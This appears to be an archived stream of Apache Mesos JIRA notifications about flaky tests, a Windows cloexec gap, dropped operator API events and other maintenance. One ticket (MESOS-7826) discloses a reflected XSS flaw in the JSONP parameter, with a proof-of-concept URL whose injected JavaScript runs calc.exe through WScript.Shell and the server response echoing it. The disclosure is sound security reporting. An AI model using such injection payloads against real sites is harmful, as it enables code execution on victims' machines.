2018-01-22 Thread Benjamin Bannier (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8474?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benjamin Bannier updated MESOS-8474:

 Labels: flaky flaky-test mesosphere  (was: )
Component/s: storage

> Test StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky
> 
>
> Key: MESOS-8474
> URL: https://issues.apache.org/jira/browse/MESOS-8474
> Project: Mesos
>  Issue Type: Bug
>  Components: storage, test
>Affects Versions: 1.5.0
>Reporter: Benjamin Bannier
>Priority: Major
>  Labels: flaky, flaky-test, mesosphere
> Attachments: consoleText.txt
>
>
> Observed on our internal CI on ubuntu16.04 with SSL and GRPC enabled,
> {noformat}
> ../../src/tests/storage_local_resource_provider_tests.cpp:1898
>   Expected: 2u
>   Which is: 2
> To be equal to: destroyed.size()
>   Which is: 1
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-8474) Test StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky

2018-01-22 Thread Benjamin Bannier (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8474?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Benjamin Bannier updated MESOS-8474:

Attachment: consoleText.txt

> Test StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky
> 
>
> Key: MESOS-8474
> URL: https://issues.apache.org/jira/browse/MESOS-8474
> Project: Mesos
>  Issue Type: Bug
>  Components: storage, test
>Affects Versions: 1.5.0
>Reporter: Benjamin Bannier
>Priority: Major
>  Labels: flaky, flaky-test, mesosphere
> Attachments: consoleText.txt
>
>
> Observed on our internal CI on ubuntu16.04 with SSL and GRPC enabled,
> {noformat}
> ../../src/tests/storage_local_resource_provider_tests.cpp:1898
>   Expected: 2u
>   Which is: 2
> To be equal to: destroyed.size()
>   Which is: 1
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Created] (MESOS-8474) Test StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky

2018-01-22 Thread Benjamin Bannier (JIRA)
Benjamin Bannier created MESOS-8474:
---

 Summary: Test 
StorageLocalResourceProviderTest.ROOT_ConvertPreExistingVolume is flaky
 Key: MESOS-8474
 URL: https://issues.apache.org/jira/browse/MESOS-8474
 Project: Mesos
  Issue Type: Bug
  Components: test
Affects Versions: 1.5.0
Reporter: Benjamin Bannier


Observed on our internal CI on ubuntu16.04 with SSL and GRPC enabled,
{noformat}
../../src/tests/storage_local_resource_provider_tests.cpp:1898
  Expected: 2u
  Which is: 2
To be equal to: destroyed.size()
  Which is: 1
{noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Assigned] (MESOS-5882) `os::cloexec` does not exist on Windows

2018-01-22 Thread Andrew Schwartzmeyer (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-5882?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Andrew Schwartzmeyer reassigned MESOS-5882:
---

Assignee: Andrew Schwartzmeyer

> `os::cloexec` does not exist on Windows
> ---
>
> Key: MESOS-5882
> URL: https://issues.apache.org/jira/browse/MESOS-5882
> Project: Mesos
>  Issue Type: Bug
>  Components: stout
>Reporter: Alex Clemmer
>Assignee: Andrew Schwartzmeyer
>Priority: Major
>  Labels: mesosphere, stout
>
> `os::cloexec` does not work on Windows. It will never work at the OS level. 
> Because of this, there are likely many important and hard-to-detect bugs 
> hanging around the agent.
> This is extremely important to fix. Some possible solutions to investigate 
> (some of which are _extremely_ risky):
> * Abstract out file descriptors into a class, implement cloexec in that class 
> on Windows (since we can't rely on the OS to do it).
> * Refactor all the code that relies on `os::cloexec` to not rely on it.
> Of the two, the first seems less risky in the short term, because the cloexec 
> code only affects Windows. Depending on the semantics of the implementation 
> of the `FileDescriptor` class, it is possible that this is riskier to Windows 
> in the longer term, as the semantics of `cloexec` may have subtle difference 
> between Linux and Windows.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-8469) Mesos master might drop some events in the operator API stream

2018-01-22 Thread Greg Mann (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8469?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16334730#comment-16334730
 ] 

Greg Mann commented on MESOS-8469:
--

Review here: https://reviews.apache.org/r/65253/

> Mesos master might drop some events in the operator API stream
> --
>
> Key: MESOS-8469
> URL: https://issues.apache.org/jira/browse/MESOS-8469
> Project: Mesos
>  Issue Type: Bug
>Reporter: Vinod Kone
>Assignee: Greg Mann
>Priority: Critical
>
> Inside `Master::updateTask`, we call `Subscribers::send` which asynchronously 
> calls `Subscribers::Subscriber::send` on each subscriber.
> But the problem is that inside `Subscribers:Subscriber::send` we are looking 
> up the state of the master (e.g., getting Task* and Framework*) which might 
> have changed between `Subscribers::send ` and `Subscribers::Subscriber::send`.
>  
> For example, if a terminal task received an acknowledgement the task might be 
> removed from master's state, causing us to drop the TASK_UPDATED event.
>  
> We noticed this in an internal cluster, where a TASK_KILLED update was sent 
> to one subscriber but not the other.
>  
>  
>  



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Assigned] (MESOS-6551) Add attach/exec commands to the Mesos CLI

2018-01-22 Thread Armand Grillet (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-6551?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Armand Grillet reassigned MESOS-6551:
-

Assignee: Armand Grillet  (was: Kevin Klues)

> Add attach/exec commands to the Mesos CLI
> -
>
> Key: MESOS-6551
> URL: https://issues.apache.org/jira/browse/MESOS-6551
> Project: Mesos
>  Issue Type: Task
>  Components: cli
>Reporter: Kevin Klues
>Assignee: Armand Grillet
>Priority: Critical
>  Labels: debugging, mesosphere
>
> After all of this support has landed, we need to update the Mesos CLI to 
> implement {{attach}} and {{exec}} functionality as outlined in the Design Doc



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Comment Edited] (MESOS-7016) Make default AWAIT_* duration configurable

2018-01-22 Thread James Peach (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-7016?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16329715#comment-16329715
 ] 

James Peach edited comment on MESOS-7016 at 1/22/18 4:08 PM:
-

| [r/65201|https://reviews.apache.org/r/65201] | Added a global 
DEFAULT_TEST_TIMEOUT variable. |
| [r/65202|https://reviews.apache.org/*r/65202] | Adopted the libprocess 
`DEFAULT_TEST_TIMEOUT`. |


was (Author: jamespeach):
| [r/65201|https://reviews.apache.org/r/65201] | Added a global 
DEFAULT_TEST_TIMEOUT variable. |
| [*r/65202|https://reviews.apache.org/*r/65202] | Adopted the libprocess 
`DEFAULT_TEST_TIMEOUT`. |

> Make default AWAIT_* duration configurable
> --
>
> Key: MESOS-7016
> URL: https://issues.apache.org/jira/browse/MESOS-7016
> Project: Mesos
>  Issue Type: Improvement
>  Components: libprocess, test
>Reporter: Benjamin Bannier
>Assignee: James Peach
>Priority: Major
> Fix For: 1.6.0
>
>
> libprocess defines a number of helpers {{AWAIT_*}} to wait for a 
> {{process::Future}} reaching terminal states. These helpers are used in tests.
> Currently the default duration to wait before triggering an assertion failure 
> is 15s. This value was chosen as a compromise between failing fast on likely 
> fast developer machines, but also allowing enough time for tests to pass in 
> high-contention environments (e.g., overbooked CI machines).
> If a machine is more overloaded than expected, {{Futures}} might take longer 
> to reach the desired state, and tests could fail. Ultimately we should 
> consider running tests with paused clock to eliminate this source of test 
> flakiness, see MESOS-4101, but as an intermediate measure we should make the 
> default timeout duration configurable.
> A simple approach might be to expose a build variable allowing users to set 
> at configure/cmake time a desired timeout duration for the setup they are 
> building for. This would allow us to define longer timeouts in the CI build 
> scripts, while keeping default timeouts as short as possible.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-7503) Consider improving the WebUI failed to connect dialog.

2018-01-22 Thread Dennis (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-7503?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16334283#comment-16334283
 ] 

Dennis commented on MESOS-7503:
---

Same here, Mesos is running in Microsoft Azure behind a load balancer and 
/master/state and metrics/snapshot are using the internal IP of the current 
master which leads to the "failed to connect" errors...

 

> Consider improving the WebUI failed to connect dialog.
> --
>
> Key: MESOS-7503
> URL: https://issues.apache.org/jira/browse/MESOS-7503
> Project: Mesos
>  Issue Type: Improvement
>  Components: webui
>Affects Versions: 1.2.0
>Reporter: Anand Mazumdar
>Priority: Major
>  Labels: mesosphere, webui
> Attachments: Capture d’écran 2017-05-12 à 15.06.07.png
>
>
> Usually, when your Mesos Master is behind a reverse proxy/LB; the keepalive 
> timeout value would be set to a small value e.g., 60 seconds for nginx. This 
> results in the persistent connection between the browser and the Mesos master 
> breaking resulting in the connection lost dialog (see attached screenshot). 
> This is very inconvenient when debugging using the Web UI.
> We should consider making the error dialog less intrusive e.g., update an 
> element to signify that a reconnection is in progress similar to what other 
> online services like gmail etc. do.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Created] (MESOS-8473) Authorize `GET_OPERATIONS` calls.

2018-01-22 Thread Jan Schlicht (JIRA)
Jan Schlicht created MESOS-8473:
---

 Summary: Authorize `GET_OPERATIONS` calls.
 Key: MESOS-8473
 URL: https://issues.apache.org/jira/browse/MESOS-8473
 Project: Mesos
  Issue Type: Task
  Components: agent, master
Reporter: Jan Schlicht


The {{GET_OPERATIONS}} call lists all known operations on a master or agent. 
Authorization has to be added to this call.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-8462) Unit test for `Slave::detachFile` on removed frameworks.

2018-01-22 Thread Qian Zhang (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8462?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16334247#comment-16334247
 ] 

Qian Zhang commented on MESOS-8462:
---

There is already a test {{SlaveRecoveryTest.RecoverCompletedExecutor}} which 
verifies the recovery for a complete executor, I improved it by checking the 
executor's work and meta directories after the recovery.

RR: https://reviews.apache.org/r/65263

> Unit test for `Slave::detachFile` on removed frameworks.
> 
>
> Key: MESOS-8462
> URL: https://issues.apache.org/jira/browse/MESOS-8462
> Project: Mesos
>  Issue Type: Improvement
>Reporter: Chun-Hung Hsiao
>Assignee: Qian Zhang
>Priority: Major
>  Labels: mesosphere
>
> We should add a unit test for MESOS-8460.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Updated] (MESOS-8462) Unit test for `Slave::detachFile` on removed frameworks.

2018-01-22 Thread Qian Zhang (JIRA)

 [ 
https://issues.apache.org/jira/browse/MESOS-8462?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel
 ]

Qian Zhang updated MESOS-8462:
--
Target Version/s: 1.6.0  (was: 1.5.1)

> Unit test for `Slave::detachFile` on removed frameworks.
> 
>
> Key: MESOS-8462
> URL: https://issues.apache.org/jira/browse/MESOS-8462
> Project: Mesos
>  Issue Type: Improvement
>Reporter: Chun-Hung Hsiao
>Assignee: Qian Zhang
>Priority: Major
>  Labels: mesosphere
>
> We should add a unit test for MESOS-8460.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-7742) ContentType/AgentAPIStreamingTest.AttachInputToNestedContainerSession is flaky

2018-01-22 Thread Andrei Budnik (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-7742?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16334227#comment-16334227
 ] 

Andrei Budnik commented on MESOS-7742:
--

https://reviews.apache.org/r/65261/

I think this patch provides a better solution than retrying to 
[connect|https://github.com/apache/mesos/blob/336e932199643e88c0edbea7c1f08d4b45596389/src/slave/containerizer/mesos/io/switchboard.cpp#L696-L700],
because otherwise it's needed to:
# Use one more `loop` for retrying logic
# Define the limit of retry attempts and delay between attempts
# It might retry to connect due to some non-ECONNREFUSED error

> ContentType/AgentAPIStreamingTest.AttachInputToNestedContainerSession is flaky
> --
>
> Key: MESOS-7742
> URL: https://issues.apache.org/jira/browse/MESOS-7742
> Project: Mesos
>  Issue Type: Bug
>  Components: agent
>Affects Versions: 1.5.0
>Reporter: Vinod Kone
>Assignee: Andrei Budnik
>Priority: Major
>  Labels: flaky-test, mesosphere-oncall
> Fix For: 1.6.0
>
> Attachments: AgentAPITest.LaunchNestedContainerSession-badrun.txt, 
> LaunchNestedContainerSessionDisconnected-badrun.txt
>
>
> Observed this on ASF CI and internal Mesosphere CI. Affected tests:
> {noformat}
> AgentAPIStreamingTest.AttachInputToNestedContainerSession
> AgentAPITest.LaunchNestedContainerSession
> AgentAPITest.AttachContainerInputAuthorization/0
> AgentAPITest.LaunchNestedContainerSessionWithTTY/0
> AgentAPITest.LaunchNestedContainerSessionDisconnected/1
> {noformat}
> This issue comes at least in three different flavours. Take 
> {{AgentAPIStreamingTest.AttachInputToNestedContainerSession}} as an example.
> h5. Flavour 1
> {noformat}
> ../../src/tests/api_tests.cpp:6473
> Value of: (response).get().status
>   Actual: "503 Service Unavailable"
> Expected: http::OK().status
> Which is: "200 OK"
> Body: ""
> {noformat}
> h5. Flavour 2
> {noformat}
> ../../src/tests/api_tests.cpp:6473
> Value of: (response).get().status
>   Actual: "500 Internal Server Error"
> Expected: http::OK().status
> Which is: "200 OK"
> Body: "Disconnected"
> {noformat}
> h5. Flavour 3
> {noformat}
> /home/ubuntu/workspace/mesos/Mesos_CI-build/FLAG/CMake/label/mesos-ec2-ubuntu-16.04/mesos/src/tests/api_tests.cpp:6367
> Value of: (sessionResponse).get().status
>   Actual: "500 Internal Server Error"
> Expected: http::OK().status
> Which is: "200 OK"
> Body: ""
> {noformat}



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-7826) XSS in JSONP parameter

2018-01-22 Thread Alexander Rojas (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-7826?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16334043#comment-16334043
 ] 

Alexander Rojas commented on MESOS-7826:


We don't have any plans to take into this anytime soon. 

> XSS in JSONP parameter
> --
>
> Key: MESOS-7826
> URL: https://issues.apache.org/jira/browse/MESOS-7826
> Project: Mesos
>  Issue Type: Improvement
>  Components: json api
> Environment: Running as part of DC/OS in a docker container.
>Reporter: Vincent Ruijter
>Priority: Critical
>
> It is possible to inject arbitrary content into a server request. Take into 
> account the following url: 
> https://xxx.xxx.com/mesos/master/state?jsonp=var+oShell+%3d+new+ActiveXObject("WScript.Shell")%3boShell.Run("calc.exe",+1)%3b
> This will result in the following request:
> {code:html}
> GET 
> /mesos/master/state?jsonp=var+oShell+%3d+new+ActiveXObject("WScript.Shell")%3boShell.Run("calc.exe",+1)%3b
>  HTTP/1.1
> Host: xxx.xxx.com
> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 
> Firefox/54.0
> Accept: */*
> Accept-Language: en-US,en;q=0.5
> [...SNIP...]
> {code}
> The server response:
> {code:html}
> HTTP/1.1 200 OK
> Server: openresty/1.9.15.1
> Date: Tue, 25 Jul 2017 09:04:31 GMT
> Content-Type: text/javascript
> Content-Length: 1411637
> Connection: close
> var oShell = new ActiveXObject("WScript.Shell");oShell.Run("calc.exe", 
> 1);({"version":"1.2.1","git_sha":"f219b2e4f6265c0b6c4d826a390b67fe9d5e1097","build_date":"2017-06-01
>  19:16:40","build_time":149634
> [...SNIP...]
> {code}
> On Internet Explorer this will trigger a file download, and when executing 
> the file (state.js), it will pop-up a calculator. It's my recommendation to 
> apply input validation on this parameter, to prevent abuse.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Comment Edited] (MESOS-8305) DefaultExecutorTest.ROOT_MultiTaskgroupSharePidNamespace is flaky.

2018-01-22 Thread Qian Zhang (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8305?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16334022#comment-16334022
 ] 

Qian Zhang edited comment on MESOS-8305 at 1/22/18 8:35 AM:


I reproduced this issue once in my own env by running this test repeatedly, and 
when it happened, I checked the sandbox of the two tasks, and found both of the 
two tasks have already successfully written the pid namespace to a file in the 
sandbox, i.e., {{pidNamespace2.get()}} is actually not empty, instead it has a 
value which is same with {{pidNamespace1.get()}}. I think this proves the point 
in my previous comment: the test tries to read the file in the task's sandbox 
after that file is created but before it is written.


was (Author: qianzhang):
I reproduced this issue once in my own env by running this test repeatedly, and 
when it happened, I checked the sandbox of the two tasks, and found both of the 
two tasks have already successfully write the pid namespace to a file in the 
sandbox, i.e., {{pidNamespace2.get()}} is actually not empty, instead it has a 
value which is same with {{pidNamespace1.get()}}. I think this proves the point 
in my previous comment: the test tries to read the file in the task's sandbox 
after that file is created but before it is written.

> DefaultExecutorTest.ROOT_MultiTaskgroupSharePidNamespace is flaky.
> --
>
> Key: MESOS-8305
> URL: https://issues.apache.org/jira/browse/MESOS-8305
> Project: Mesos
>  Issue Type: Bug
> Environment: Ubuntu 16.04
> Fedora 23
>Reporter: Alexander Rukletsov
>Assignee: Qian Zhang
>Priority: Major
>  Labels: flaky-test
> Attachments: ROOT_MultiTaskgroupSharePidNamespace-badrun.txt
>
>
> On Ubuntu 16.04:
> {noformat}
> ../../src/tests/default_executor_tests.cpp:1877
>   Expected: strings::trim(pidNamespace1.get())
>   Which is: "4026532250"
> To be equal to: strings::trim(pidNamespace2.get())
>   Which is: ""
> {noformat}
> Full log attached.
> On Fedora 23:
> {noformat}
> ../../src/tests/default_executor_tests.cpp:1878
>   Expected: strings::trim(pidNamespace1.get())
>   Which is: "4026532233"
> To be equal to: strings::trim(pidNamespace2.get())
>   Which is: ""
> {noformat}
> The test became flaky shortly after MESOS-7306 has been committed and likely 
> related to it.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)


[jira] [Commented] (MESOS-8305) DefaultExecutorTest.ROOT_MultiTaskgroupSharePidNamespace is flaky.

2018-01-22 Thread Qian Zhang (JIRA)

[ 
https://issues.apache.org/jira/browse/MESOS-8305?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=16334022#comment-16334022
 ] 

Qian Zhang commented on MESOS-8305:
---

I reproduced this issue once in my own env by running this test repeatedly, and 
when it happened, I checked the sandbox of the two tasks, and found both of the 
two tasks have already successfully write the pid namespace to a file in the 
sandbox, i.e., {{pidNamespace2.get()}} is actually not empty, instead it has a 
value which is same with {{pidNamespace1.get()}}. I think this proves the point 
in my previous comment: the test tries to read the file in the task's sandbox 
after that file is created but before it is written.

> DefaultExecutorTest.ROOT_MultiTaskgroupSharePidNamespace is flaky.
> --
>
> Key: MESOS-8305
> URL: https://issues.apache.org/jira/browse/MESOS-8305
> Project: Mesos
>  Issue Type: Bug
> Environment: Ubuntu 16.04
> Fedora 23
>Reporter: Alexander Rukletsov
>Assignee: Qian Zhang
>Priority: Major
>  Labels: flaky-test
> Attachments: ROOT_MultiTaskgroupSharePidNamespace-badrun.txt
>
>
> On Ubuntu 16.04:
> {noformat}
> ../../src/tests/default_executor_tests.cpp:1877
>   Expected: strings::trim(pidNamespace1.get())
>   Which is: "4026532250"
> To be equal to: strings::trim(pidNamespace2.get())
>   Which is: ""
> {noformat}
> Full log attached.
> On Fedora 23:
> {noformat}
> ../../src/tests/default_executor_tests.cpp:1878
>   Expected: strings::trim(pidNamespace1.get())
>   Which is: "4026532233"
> To be equal to: strings::trim(pidNamespace2.get())
>   Which is: ""
> {noformat}
> The test became flaky shortly after MESOS-7306 has been committed and likely 
> related to it.



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)